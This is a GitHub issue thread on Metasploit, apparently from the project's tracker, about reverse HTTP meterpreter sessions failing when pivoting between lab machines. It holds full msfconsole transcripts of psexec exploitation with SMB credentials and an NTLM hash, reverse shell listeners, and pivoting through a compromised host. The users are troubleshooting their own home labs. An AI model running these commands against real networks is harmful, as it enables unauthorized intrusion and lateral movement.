Open MDhouiou opened 2 months ago
smcintyre-r7
commented
2 months ago I'm thinking there's a configuration error here. Would it be possible for you to:
show options).
MDhouiou
commented
2 months ago Hi Spencer,
Here is the configuration of the VMS:
--First Scenario with two linux target VMs--
Kali: 172.16.1.200/24
Debian(First Target): 172.16.1.10/24
Debian(Second Target): 172.16.1.20/24
--Second Scenario with linux and windows target VMs--
Kali: 172.16.1.200/24
Debian(First Target): 172.16.1.10/24
Windows(Second Target): 172.16.1.100/24And here is the copied text from the msfconsole with the payload options:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_http
PAYLOAD => linux/x64/meterpreter_reverse_http
msf6 exploit(multi/handler) > set LHOST 172.16.1.200
LHOST => 172.16.1.200
msf6 exploit(multi/handler) > set LPORT 3980
LPORT => 3980
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x64/meterpreter_reverse_http):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.1.200 yes The local listener hostname
LPORT 3980 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[*] Started HTTP reverse handler on http://172.16.1.200:3980
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARwUXNNxKiAdLGTEbkDxyqw6Nn5UVKVWBTlMuEK with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARw0AgELhZdc5oi0NuuuQkYPNKLjQsVygYEOs2rOeVujNJ6ERY1D-saOg0Eamx94KUdIrdtQJpIZtayQpQziToz with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARw8ZyB1bn with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARwCRrS8K3T503x6vrUduA2rmApNRQrA7PsGbawYNH8o6j4wV86UT-pBAdVNgYYoKaA1m371Pp-a5-pcLi9MN6h_W_45knsYzMJf8dl3tU with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARwXM_ddLz17HR16-lrIH7eCD7CP7vNlyNznpivYelTPhStOGQJrlwKaoaFL_Iroqd_bVa9U5REWpNm9rw with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (172.16.1.200:3980 -> 172.16.1.10:39852) at 2024-03-13 10:46:52 +0100
msf6 exploit(multi/handler) > route add 172.16.1.0/24 1
[*] Route added
msf6 exploit(multi/handler) > set LHOST 172.16.1.10
LHOST => 172.16.1.10
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x64/meterpreter_reverse_http):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.1.10 yes The local listener hostname
LPORT 3980 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[*] Started HTTP reverse handler on http://172.16.1.10:3980
msf6 exploit(multi/handler) >
[*] http://172.16.1.10:3980 handling request from 172.16.1.20; (UUID: paiwgyxe) Redirecting stageless connection from /wsH7kz2P3E77yv3InjuMzAfVrCiLtiO7c with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'Thank you for your support :)
smcintyre-r7
commented
2 months ago What's the output of the jobs command? It should show that the multi/handler module is running and in the Payload options that it's listening via the session. That would be an important thing to confirm. Next you should use your session on the first compromised host (Debian 1 172.16.1.10) and run netstat to ensure that it's listening on 3980.
If all that's in place, you should check that Debian 1 doesn't have any kind of firewall or anything that'd be preventing the connection from the second target.
It looks like everything you've setup is correct but checking those things can help eliminate some common problems.
LongWayHomie
commented
1 month ago Hello, bumping it since I have similar problem with windows/x64/meterpreter/reverse_http payload.
Pivoting with this payload seems to be not valid and msf does not spawn a session. Here's a snippet from my lab:
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.122.30 no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 no The target port (TCP)
SMBDomain dev.cyberbotic.io no The Windows domain to use for authentication
SMBPass 59fc0f884922b4ce376051134c71e22c:59fc0f884922b4ce376051134c71e22c no The password for the specified username
SMBUser jking no The username to authenticate as
Used when connecting via an existing SESSION:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION no The session to run this module on
Payload options (windows/x64/meterpreter/reverse_http):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.123.102 yes The local listener hostname
LPORT 5555 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
1 PowerShell
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/psexec) > set LPORT 6666
LPORT => 6666
msf6 exploit(windows/smb/psexec) > exploit
[*] 10.10.122.30:445 - Connecting to the server...
[*] 10.10.122.30:445 - Authenticating to 10.10.122.30:445|dev.cyberbotic.io as user 'jking'...
[*] 10.10.122.30:445 - Executing the payload...
[+] 10.10.122.30:445 - Service start timed out, OK if running a command or non-service executable...
[!] http://10.10.123.102:6666 handling request from 10.10.122.30; (UUID: ajjzjj73) Without a database connected that payload UUID tracking will not work!
[*] http://10.10.123.102:6666 handling request from 10.10.122.30; (UUID: ajjzjj73) Staging x64 payload (202844 bytes) ...
[!] http://10.10.123.102:6666 handling request from 10.10.122.30; (UUID: ajjzjj73) Without a database connected that payload UUID tracking will not work!
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/psexec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
6 meterpreter x64/windows DEV\jking @ WKSTN-2 10.9.254.6:8080 -> 10.10.122.254:44120 (10.10.122.254)
7 meterpreter x64/windows DEV\bfarmer @ WKSTN-2 10.9.254.6:8080 -> 10.10.122.254:44122 (10.10.123.102)
8 meterpreter x64/windows DEV\bfarmer @ WKSTN-2 10.9.254.6:8080 -> 10.10.122.254:44154 (10.10.122.254)
9 meterpreter x64/windows 10.10.122.30:6666 -> 10.10.122.30:57286 via session 7 (10.10.122.30)
msf6 exploit(windows/smb/psexec) >
[-] Meterpreter session 9 is not valid and will be closed
[*] 10.10.122.30 - Meterpreter session 9 closed. Reason: Died
msf6 exploit(windows/smb/psexec) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
1 Auxiliary: server/socks_proxy
21 Exploit: multi/handler windows/x64/meterpreter/reverse_http http://10.9.254.6:8080
23 Exploit: multi/handler windows/x64/meterpreter/reverse_http http://10.10.123.102:6666 via the meterpreter on session 7MSF is listening on 10.9.254.6 (Kali) and listener is also set up on first victim (pivot) on 10.10.123.102 on port 6666. Trying to spawn session on server 10.10.122.30, but session is dying while downloading from stager. I have tried with other HTTP payload which was windows/x64/meterpreter/reverse_winhttp and it seems it's working fine. So my best guess is that reverse_http is making some problems while pivoting. And yeah, there's squid proxy in lab, which is proxying traffic for workstations (10.10.123.102).
smcintyre-r7
commented
1 month ago Yeah, I still can't reproduce any issues here. In my lap setup .128 is my system running Metasploit, .10 is one Windows target and .40 is another. I'm able to open my first Meterpreter session to .10 and then a second to .40 by having Metasploit start a listener on .10. I tried with the reverse_http, reverse_https and reverse_winhttp stagers. All of them worked.
metasploit-framework (S:0 J:0) exploit(windows/smb/psexec) > run RHOSTS=192.168.159.10 SMBPass=Password1! LHOST=192.168.159.128 PAYLOAD=windows/x64/meterpreter/reverse_http
[*] Started HTTP reverse handler on http://192.168.159.128:8080
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Executing the payload...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] http://192.168.159.128:8080 handling request from 192.168.159.10; (UUID: 5tm6qdwe) Staging x64 payload (202844 bytes) ...
[*] Meterpreter session 13 opened (192.168.159.128:8080 -> 192.168.159.10:49840) at 2024-04-15 10:18:23 -0400
meterpreter > background
[*] Backgrounding session 13...
metasploit-framework (S:1 J:0) exploit(windows/smb/psexec) > run RHOSTS=192.168.159.40 SMBPass=Password2! LHOST=192.168.159.10 ReverseListenerComm=13 PAYLOAD=windows/x64/meterpreter/reverse_http
[*] Started HTTP reverse handler on http://192.168.159.10:8080
[*] 192.168.159.40:445 - Connecting to the server...
[*] 192.168.159.40:445 - Authenticating to 192.168.159.40:445 as user 'smcintyre'...
[*] 192.168.159.40:445 - Selecting PowerShell target
[*] 192.168.159.40:445 - Executing the payload...
[+] 192.168.159.40:445 - Service start timed out, OK if running a command or non-service executable...
[*] http://192.168.159.10:8080 handling request from 192.168.159.40; (UUID: aoiyj5x9) Staging x64 payload (202844 bytes) ...
[*] Meterpreter session 14 opened (192.168.159.40:8080 -> 192.168.159.40:64828 via session 13) at 2024-04-15 10:18:43 -0400
meterpreter > background
[*] Backgrounding session 14...
metasploit-framework (S:2 J:0) exploit(windows/smb/psexec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
13 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DC 192.168.159.128:8080 -> 192.168.159.10:49840 (192.168.159.10)
14 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DC22 192.168.159.40:8080 -> 192.168.159.40:64828 via session 13 (192.168.159.40)
metasploit-framework (S:2 J:0) exploit(windows/smb/psexec) > I recommend you try to simplify your setup as I did by not using the exploit/multi/handler module and just have the psexec exploit start the listener. You can tell it which session to use to start the handler with the ReverseListenerComm datastore option.
github-actions[bot]
commented
2 weeks ago Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Hi,
I'm testing some attack scenarios in my home lab. To gain initial access to the first machine, I am utilizing the linux/x64/meterpreter_reverse_http payload. Subsequently, I am employing the same payload to facilitate lateral movement to the second machine.
Scenario: Kali ->(metrpreter_reverse_http)->First target (Debian) ->(metrpreter_reverse_http)->Second target (Debian)
While the first session works fine without any problems, when I set up the listener for the second session and run the second payload on the second target VM, it doesn't open the second session.
I do recieve the request to the handler but no session is opened..
[First Session works]
[Second Session not opening]
I've also tested the scenario: Kali ->(linux/x64/metrpreter_reverse_http)->First target (Debian) ->(windows/metrpreter_reverse_http)->Second target (windows)
In this case, both sessions work without any problem.
So, my question is: Why can't the second session be opened in the first scenario?
I would greatly appreciate any assistance or guidance from anyone who can help.
Thank you :)